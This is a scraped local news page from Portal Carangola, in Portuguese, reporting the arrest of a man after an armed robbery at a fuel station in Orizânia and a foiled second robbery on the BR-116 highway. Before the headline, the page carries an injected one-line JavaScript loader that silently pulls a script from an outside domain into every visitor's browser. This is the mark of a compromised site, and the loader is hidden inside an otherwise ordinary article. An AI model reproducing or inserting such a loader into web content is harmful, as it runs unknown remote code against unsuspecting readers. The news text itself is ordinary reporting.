;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Homem é preso após assalto a Posto de Combustíveis em Orizânia - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Homem é preso após assalto a Posto de Combustíveis em Orizânia

Policiais militares de Orizânia, com apoio de militares de Divino, prenderam um homem de 27 anos, na noite passada (3), por assalto e tentativa de assalto a postos de combustíveis. Ele foi levado para a delegacia do bairro Safira, em Muriaé.
A ocorrência começou com um assalto a um posto em Orizânia. As vítimas contaram à PM que dois homens chegaram em uma moto; um deles, armado, após render o frentista e agredi-lo com uma coronhada, levou a quantia de R$ 170,00. Em seguida, a dupla fugiu sentido à BR 116. Em 5 meses, esse foi o 3º assalto ao estabelecimento.
Durante rastreamento, quando chegaram a um outro posto de combustíveis, já no km 624 da rodovia, os policiais foram informados sobre uma tentativa de assalto que havia acabado de acontecer. A ação dos bandidos foi frustrada por um policial militar do estado do Rio de Janeiro, que estava no restaurante do posto e reagiu, atirando contra os ladrões, que abandonaram a moto e fugiram a pé por um matagal, do outro lado da pista. Ninguém ficou ferido.
O rapaz foi encontrado perto dali e abordado pelos policiais. Ele recebeu voz de prisão após ser reconhecido pelas testemunhas dos dois postos de combustíveis. Segundo a Polícia Civil, como nada foi encotrado com o suspeito, ele foi ouvido e vai responder em liberdade.
De acordo com o boletim de ocorrência da PM, o registro da tentativa de assalto ao segundo posto ficou a cargo da Polícia Rodoviária Federal da cidade de Fervedouro.


Fonte : Rádio Muriaé


Ofertas clique aqui


[vitrine]cameras[/vitrine]

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.